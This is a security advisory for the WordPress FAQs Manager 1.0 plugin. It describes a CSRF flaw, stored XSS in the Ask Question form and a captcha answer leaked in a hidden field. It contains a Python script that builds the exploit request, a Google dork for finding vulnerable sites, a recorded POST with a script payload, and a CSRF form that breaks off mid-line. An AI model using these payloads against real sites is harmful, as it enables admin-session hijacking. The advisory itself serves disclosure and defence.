Release date: 2013-03-22
Update date: 2013-03-26
Affected systems:
WordPress FAQs Manager 1.0
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 58645
WordPress FAQs Manager is a plugin for managing a site's FAQ.
FAQs Manager 1.0 (other versions may also be affected) has a cross-site request forgery vulnerability in the IndiaNIC FAQ settings page and a stored cross-site scripting vulnerability in the front-end Ask Question form: the question parameter is not sanitized, so an attacker can submit <script>alert(1)</script> as a question and the script runs when an administrator opens the questions area in the back-end. The captcha on the Ask Question form provides no protection, because the expected captcha value is exposed in a hidden captcha form field and can simply be copied into the answer. Successful exploitation lets an attacker execute arbitrary script code in the browser of a user of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, and disclose or modify sensitive information.
<*Source: m3tamantra
*>
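The following Python script is an added example for this advisory; it is not part of the original exploit and not code from the FAQs Manager plugin. It parses a copy of the plugin's Ask Question form, shows that the expected captcha answer can be read straight out of the hidden captcha field, and assembles the same admin-ajax.php POST body that the request in the test method below uses. The form HTML inside it is constructed from the fragment quoted in the test method; the field names group_id, from_user, action, captcha, who_asked, question and captcha_code are taken from the parameters of the recorded request, and the _wpnonce check is a generic WordPress heuristic, not something the advisory states about the plugin.

```python
"""Audit the plugin's Ask Question form and build the advisory's request.

Added example for this advisory, not code from the original exploit or
from the FAQs Manager plugin.  It shows why the captcha on the front-end
form is worthless: the expected answer sits in a hidden input named
"captcha", so a client can copy it straight into "captcha_code".  The form
HTML below is constructed from the fragment in the advisory; the hidden
field names (group_id, from_user, action, captcha) and the visible fields
(who_asked, question, captcha_code) are taken from the parameters of the
recorded admin-ajax.php request.
"""
from html.parser import HTMLParser
from urllib.parse import urlencode

# Constructed sample of the plugin's Ask Question form (see the docstring).
ASK_QUESTION_FORM = """
<form action="" method="POST">
  <input type="hidden" name="group_id" value="1">
  <input type="hidden" name="from_user" value="1">
  <input type="hidden" name="action" value="inic_faq_questions">
  <input type="hidden" name="captcha" value="5540">
  <input type="text" name="who_asked">
  <textarea name="question"></textarea>
  <input type="text" name="captcha_code">
</form>
"""


class HiddenFieldParser(HTMLParser):
    """Collect name/value pairs of every <input type="hidden">."""

    def __init__(self):
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        a = dict(attrs)
        if (a.get("type") or "").lower() == "hidden" and a.get("name"):
            self.fields[a["name"]] = a.get("value") or ""


def hidden_fields(form_html):
    """Return the hidden inputs of a form as a dict in document order."""
    parser = HiddenFieldParser()
    parser.feed(form_html)
    return parser.fields


def leaked_captcha_fields(fields):
    """Names of hidden inputs that mention the captcha.

    A captcha only works if the client does not know the expected answer;
    a hidden field carrying it means the check can be satisfied blindly.
    """
    return [name for name in fields if "captcha" in name.lower()]


def build_ask_question_body(fields, who_asked, question):
    """Build the application/x-www-form-urlencoded body of the
    admin-ajax.php POST in the same parameter order as the advisory's
    request: the hidden fields first, then the user-supplied ones, with
    captcha_code copied from the leaked hidden captcha value."""
    params = dict(fields)
    params["who_asked"] = who_asked
    params["question"] = question
    params["captcha_code"] = fields["captcha"]
    return urlencode(params)


def audit_ask_question_form(form_html):
    """Two checks a reviewer runs on such a form: does a hidden field leak
    the captcha answer, and is there a WordPress nonce field (_wpnonce is
    the default name written by wp_nonce_field) that the AJAX handler
    could verify with check_ajax_referer?  The advisory quotes only part of
    the form, so the nonce result is only meaningful against a live page."""
    fields = hidden_fields(form_html)
    return {
        "captcha_answer_in_hidden_field": leaked_captcha_fields(fields),
        "nonce_field_present": "_wpnonce" in fields,
    }


if __name__ == "__main__":
    fields = hidden_fields(ASK_QUESTION_FORM)
    print(audit_ask_question_form(ASK_QUESTION_FORM))
    # The advisory's payload, URL-encoded the way a browser would send it.
    print(build_ask_question_body(
        fields, "lalalallala@gmail.com", "XSS TEST <script>alert(1)</script>?"))
```

Run against the HTML of a live Ask Question page, audit_ask_question_form reports whether a hidden field carries the captcha answer and whether a WordPress nonce field is present; on the constructed sample it reports the captcha leak and no nonce, and build_ask_question_body reproduces the parameter order of the recorded request with captcha_code filled from the hidden value.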
Test method:
--------------------------------------------------------------------------------
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!
<html>
<!--
# Exploit Title: WordPress IndiaNIC FAQ 1.0 Plugin CSRF + XSS
# Google Dork: inurl:wp-content/plugins/faqs-manager
# Date: 21.03.2013
# Exploit Author: m3tamantra ()
# Vendor Homepage:
# Software Link:
# Version: 1.0
# Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli)
##############
# Description:
##############
# The IndiaNIC FAQ Settings Page is vulnerable to CSRF.
# The Ask Question area (front-end) is vulnerable to XSS. It is possible to insert <script>alert(1)</script> in the question parameter.
# The Captcha value can be read from the captcha parameter (hidden field).
#
###################################
#### Part of Ask Question form ####
###################################
# (field names taken from the parameters of the request below)
<form action="" method="POST">
<input type="hidden" name="group_id" value="1">
<input type="hidden" name="from_user" value="1">
<input type="hidden" name="action" value="inic_faq_questions">
<input type="hidden" name="captcha" value="5540"> <=================== We don't need the captcha Image when we have this xD
####################################################################
#### Request from Ask Question area (XSS in question parameter) ####
####################################################################
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1:9001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: ?p=11
Content-Length: 143
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
group_id=1&from_user=1&action=inic_faq_questions&captcha=8560&who_asked=lalalallala%40gmail.com&question=XSS+TEST+<script>alert(1)</script>%3F&captcha_code=8560
# When an admin navigates to the Question area (back-end), the arbitrary JavaScript will execute.
#######################################################################
-->
<title>
#####################################################
############## IndiaNIC FAQ 1.0 CSRF ################
#####################################################
</title>
<body>
<!-- replace "http://www.example.com/wordpress" -->
<form action="http://